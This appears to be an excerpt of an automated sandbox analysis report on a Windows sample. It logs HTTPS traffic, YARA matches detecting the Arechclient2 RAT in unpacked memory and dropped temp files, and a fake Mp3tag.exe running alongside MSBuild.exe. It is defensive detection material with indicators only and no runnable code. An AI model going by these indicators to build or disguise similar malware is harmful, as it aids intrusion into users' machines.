                            Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                            Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49699 version: TLS 1.2

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: 16.2.cmd.exe.58000c8.7.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: 20.2.MSBuild.exe.1300000.0.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: 11.2.cmd.exe.54400c8.7.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: 16.2.cmd.exe.58000c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: 11.2.cmd.exe.54400c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\umfcpwvoouwjq, type: DROPPEDMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\lcqqpedjyaav, type: DROPPEDMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_005C1868 NtResumeThread,15_2_005C1868
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C59198 NtSuspendThread,15_2_02C59198
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390CEA885_2_00007FF7390CEA88
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390C84B05_2_00007FF7390C84B0
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390CB31C5_2_00007FF7390CB31C
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390CDE905_2_00007FF7390CDE90
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390D57005_2_00007FF7390D5700
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390C5D205_2_00007FF7390C5D20
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390D682C5_2_00007FF7390D682C
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390C72885_2_00007FF7390C7288
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390DF9705_2_00007FF7390DF970
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390D41FC5_2_00007FF7390D41FC
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390C6B785_2_00007FF7390C6B78
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390E6BB45_2_00007FF7390E6BB4
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390E93D05_2_00007FF7390E93D0
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390DFBEC5_2_00007FF7390DFBEC
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390ECBD85_2_00007FF7390ECBD8
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390E8F005_2_00007FF7390E8F00
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390C65485_2_00007FF7390C6548
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390E39045_2_00007FF7390E3904
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeCode function: 7_2_0081BFA07_2_0081BFA0
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeCode function: 7_2_0082C0E07_2_0082C0E0
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 9_2_004DBFA09_2_004DBFA0
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 9_2_004EC0E09_2_004EC0E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_022BC88014_2_022BC880
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_022BB01F14_2_022BB01F
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_022B107014_2_022B1070
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_022BD11014_2_022BD110
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_022B15E014_2_022B15E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_022BC7B514_2_022BC7B5
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_022BC86214_2_022BC862
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_022BC84314_2_022BC843
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_022BA8FA14_2_022BA8FA
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_022BA90814_2_022BA908
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_022B106014_2_022B1060
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_022BB09E14_2_022BB09E
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_022BD0F314_2_022BD0F3
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_022B15C314_2_022B15C3
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_022BBD7814_2_022BBD78
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_022BBD4514_2_022BBD45
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0669B64014_2_0669B640
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_06695C1814_2_06695C18
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_06696CC014_2_06696CC0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_06694D6814_2_06694D68
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_06697A5014_2_06697A50
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0669F2B014_2_0669F2B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_06693B5014_2_06693B50
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0669004014_2_06690040
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0669283014_2_06692830
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0669096814_2_06690968
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0669C97014_2_0669C970
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0669872A14_2_0669872A
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_06695C0914_2_06695C09
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_06694D5814_2_06694D58
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0669232814_2_06692328
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_066963A814_2_066963A8
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_066963A614_2_066963A6
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_066963B114_2_066963B1
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0669206714_2_06692067
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0669207814_2_06692078
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0669001514_2_06690015
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0669C96014_2_0669C960
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_066E3ED014_2_066E3ED0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_066EB6A014_2_066EB6A0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_066E2FE814_2_066E2FE8
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_066E0FB714_2_066E0FB7
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_066ECC4814_2_066ECC48
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_066EAE7814_2_066EAE78
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_066E3EBB14_2_066E3EBB
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_066E968F14_2_066E968F
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_066E969814_2_066E9698
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_066E8B6514_2_066E8B65
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_066E2FCB14_2_066E2FCB
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_066E8B8014_2_066E8B80
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_066ECC3814_2_066ECC38
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_066EF48814_2_066EF488
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0685683014_2_06856830
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_068581C014_2_068581C0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_068552D714_2_068552D7
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_068552E814_2_068552E8
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0685000714_2_06850007
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0685161014_2_06851610
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0685162014_2_06851620
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0685004014_2_06850040
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_068581B014_2_068581B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0685372014_2_06853720
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0685373014_2_06853730
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0685954914_2_06859549
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0685955814_2_06859558
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_06B1458C14_2_06B1458C
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_06B1004014_2_06B10040
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_06B1003214_2_06B10032
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_06B1F16014_2_06B1F160
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_06B13A4914_2_06B13A49
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_06B12BE814_2_06B12BE8
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_06B12BD814_2_06B12BD8
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_072C2FF014_2_072C2FF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_072CABB014_2_072CABB0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_072C6BC414_2_072C6BC4
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_072CB98014_2_072CB980
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_072CC19B14_2_072CC19B
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_072C883014_2_072C8830
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_072C2FF014_2_072C2FF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_072C7EA714_2_072C7EA7
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_072CEEB814_2_072CEEB8
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_072C44C814_2_072C44C8
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_072C44D814_2_072C44D8
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_072C4B2914_2_072C4B29
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_072C4B3814_2_072C4B38
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_072C0B7114_2_072C0B71
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_072CE34914_2_072CE349
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_072CE35814_2_072CE358
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_072C0B8014_2_072C0B80
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_072C882314_2_072C8823
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_07412B9814_2_07412B98
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0741526814_2_07415268
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0741713014_2_07417130
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_074135C014_2_074135C0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0741998014_2_07419980
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0741004014_2_07410040
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0741D0A014_2_0741D0A0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_07412B9114_2_07412B91
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_07413F9314_2_07413F93
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_07413F9814_2_07413F98
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0741524A14_2_0741524A
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_07414EF014_2_07414EF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_07413A9014_2_07413A90
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0741711C14_2_0741711C
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0741D09014_2_0741D090
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0742D76814_2_0742D768
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0742EB0114_2_0742EB01
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0742B81814_2_0742B818
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0742A2C814_2_0742A2C8
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0742C8B814_2_0742C8B8
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_07420F4814_2_07420F48
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0742B35014_2_0742B350
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_07420F5814_2_07420F58
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0742D75814_2_0742D758
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0742B36014_2_0742B360
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0742893014_2_07428930
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_07421DD014_2_07421DD0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0742004014_2_07420040
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0742065014_2_07420650
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_0742001A14_2_0742001A
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_07426E3014_2_07426E30
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_074292A814_2_074292A8
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_074242BB14_2_074242BB
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_07410D7114_2_07410D71
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_07410D8014_2_07410D80
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_005CECB015_2_005CECB0
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_005D0EB015_2_005D0EB0
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_005D30B015_2_005D30B0
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_005CFDB015_2_005CFDB0
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_005D1FB015_2_005D1FB0
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C6CAD115_2_02C6CAD1
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C7128115_2_02C71281
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C9329915_2_02C93299
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C612B815_2_02C612B8
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C793A115_2_02C793A1
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C6531815_2_02C65318
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C8982115_2_02C89821
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C8590115_2_02C85901
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C60E6815_2_02C60E68
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C78E0115_2_02C78E01
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C877B115_2_02C877B1
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C7874115_2_02C78741
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C7340115_2_02C73401
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C8C42115_2_02C8C421
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C705F115_2_02C705F1
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C9C59215_2_02C9C592
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C85D1115_2_02C85D11
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C6E9C115_2_02C6E9C1
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C8B62115_2_02C8B621
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exe F1973746AC0A703B23526F68C639436F0B26B0BC71C4F5ADF36DC5F6E8A7F4D0
                            Source: Mp3tag.exe.5.drStatic PE information: Resource name: RT_ICON type: tar archive (old), type ' ' (, mode 06\272, seconds \020+\327, linkname :\332, comment: h\320
                            Source: Mp3tag.exe.7.drStatic PE information: Resource name: RT_ICON type: tar archive (old), type ' ' (, mode 06\272, seconds \020+\327, linkname :\332, comment: h\320
                            Source: file.exe, 00000005.00000003.1304524889.000001DFD35BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMp3tag.exe. vs file.exe
                            Source: file.exe, 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenametak_deco_lib.dll\ vs file.exe
                            Source: file.exe, 00000005.00000002.1305419841.000001DFD35BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMp3tag.exe. vs file.exe
                            Source: 16.2.cmd.exe.58000c8.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: 20.2.MSBuild.exe.1300000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: 11.2.cmd.exe.54400c8.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: 16.2.cmd.exe.58000c8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: 11.2.cmd.exe.54400c8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: C:\Users\user\AppData\Local\Temp\umfcpwvoouwjq, type: DROPPEDMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
